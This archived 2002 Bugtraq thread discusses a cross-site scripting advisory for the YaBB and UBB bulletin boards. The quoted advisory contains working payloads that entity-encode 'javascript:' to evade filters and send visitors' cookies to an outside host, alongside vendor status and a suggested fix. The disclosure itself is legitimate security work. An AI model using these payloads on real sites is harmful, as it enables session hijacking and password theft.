RE: CSS vulnerabilities in YaBB and UBB allow account hijack [Multiple Vendor]

From: Obscure (obscureat_private)
Date: Thu Jan 10 2002 - 09:44:37 PST

Next message: userat_private: "autoresponder program could be tricked by spamers to send unsolicited mail to victim's address"

Previous message: KF: "Re: Snort core dumped"
Next in thread: Andrew Clover: "Re: CSS vulnerabilities in YaBB and UBB allow account hijack [Multiple Vendor]"
Reply: Andrew Clover: "Re: CSS vulnerabilities in YaBB and UBB allow account hijack [Multiple Vendor]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Hi 3APA3A,

I recall that post, however UBB seemed that it had fixed it.
In fact UBB now filters keywords such as javascript and cookie.
To circumvent this filtering, I made use of html encoding techniques.
What I wanted to highlight in this advisory was that the protection
implemented in both UBB and YaBB against Javascript injection (aka CSS)
is vulnerable to this kind of attack. Of course the issue described by
Scott Ashman and the one described by me are very similar.

Regards,

Obscure^
obscureat_private

http://www.eyeonsecurity.net


-----Original Message-----
From: 3APA3A [mailto:3APA3Aat_private]
Sent: 10 January 2002 10:45
To: Obscure
Cc: bugtraqat_private
Subject: Re: CSS vulnerabilities in YaBB and UBB allow account hijack
[Multiple Vendor]


Hello Obscure,

This  issue was reported on Bugtraq for UBB 5 on February, 2001 by Scott
Ashman.   AlphaVersion   has  reported  weakness  in  cookie  generation
scenario.

See http://www.security.nnov.ru/search/news.asp?binid=1006

--Wednesday, January 09, 2002, 2:11:59 AM, you wrote to
bugtraqat_private:

O> Advisory Title: CSS vulnerabilities in YaBB and UBB allow account hijack
O> [Multiple Vendor]
O> Release Date: 08/01/2002

O> Application: YaBB and UBB


O> Platform: Any system supporting PERL.

O> Build -
O> YaBB : 1 Gold - Service Pack 1 - older versions were effected in the same
O> way.
O> UBB : Ultimate Bulletin BoardTM 6.2.0 Beta Release 1.0


O> Severity: Malicious users can steal session cookies, allowing
administrative
O> access to the bulletin board.

O> Author:
O> Obscure^
O> [ obscureat_private ]

O> Vendor Status:
O> YaBB - Informed on 01 Jan 2002, should fix some time in the future ...
O> UBB - Informed on 08 Jan 2002, should issue a fix on 09 Jan 2002 (seems
like
O> they knew about the issue).

O> Web:

O> http://yabb.xnull.com
O> http://www.infopop.com/products/ubb/
O> http://eyeonsecurity.net/advisories/css_in_yabb_and_ubb.html


O> Background.

O> (extracted from
O> http://yabb.xnull.com)

O> YaBB is a leading provider of FREE, downloadable Perl forums for
webmasters,
O> with currently over 50,000 web communities using YaBB worldwide, and over
1
O> million registered users througout these forums! Join the messaging
O> revolution;
O> keep visitors coming back....

O> (extracted from
O> http://www.infopop.com/products/ubb/)
O> The Ultimate Bulletin Board (UBB)™ is the most widely adopted Perl
message
O> board on
O> the Web. With a solid five year development history, and worldwide
O> familiarity, it is easy to
O> use and maintain.

O> Problem.

O> When a user inserts [IMG]url[/IMG], YaBB changes that text to <img
O> src='url'>.
O> If someone inserts javascript:alert() instead of the url, the javascript
O> code
O> is executed by Internet Explorer or some other web browsers. This allows
O> stealing
O>  of cookie data and other interesting things. YaBB has filtered the
O> javascript
O> method, however it does not take into consideration that javascript: can
be
O> encoded using standard HTML hex and ASCII encoding. Same with UBB.
O> In UBB I need to encode several strings because they added checking for
O> certain
O> keywords such as cookie.
O> In my example I change javascript: to javascr&#x69;pt:


O> Exploit Example.

O> Inserting a new topic (or reply) with the following text will send
visitor's
O> cookies
O> to Eye on Security. The output is saved to
O> http://eyeonsecurity.net/tools/cookies.txt .
O> Cookies will contain the password in the case of UBB and a session cookie
O> (or encoded
O> password) in YaBB.

O> -- snap YaBB --

O> [img]javascr&#x69;pt:document.write
O> ('&#x3cimg
O>
src=&#x68;tt&#x70;://eyeonsecurity.net/tools/cookie.plx?cookie='+escape(docu
O> ment.cookie)+'&#x3e')
O> [/img].

O> -- snap YaBB --

O> -- snap UBB --

O> [IMG]javascr&#x69;pt:document.wr&#x69;te
O> &#x28;'<img%20src=&#x68;tt&#x70;://eyeonsecurity.net/tools/cookie.plx?

O> cookie='+escape&#x28;document.cook&#x69;e&#x29;+'>'&#x29;
O> [/IMG]

O> -- snap UBB --


O> Fix.

O> IMG tags should start with http, so that Javascript: and other goodies
(play
O> with mailto:)
O> are not allowed.


O> Note.

O> Other Bulletin Board Systems may also be vulnerable to these attacks.


O> Disclaimer.

O> The information within this document may change without notice. Use of
O> this information constitutes acceptance for use in an AS IS
O> condition. There are NO warranties with regard to this information.
O> In no event shall the author be liable for any consequences whatsoever
O> arising out of or in connection with the use or spread of this
O> information. Any use of this information lays within the user's
O> responsibility.


O> Feedback.

O> Please send suggestions, updates, and comments to:

O> Eye on Security
O> mail : obscureat_private
O> web : http://www.eyeonsecurity.net



--
~/ZARAZA
Существую лишь я сам, никуда не летя. (Лем)

Next message: userat_private: "autoresponder program could be tricked by spamers to send unsolicited mail to victim's address"
Previous message: KF: "Re: Snort core dumped"
Next in thread: Andrew Clover: "Re: CSS vulnerabilities in YaBB and UBB allow account hijack [Multiple Vendor]"
Reply: Andrew Clover: "Re: CSS vulnerabilities in YaBB and UBB allow account hijack [Multiple Vendor]"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Thu Jan 10 2002 - 20:12:22 PST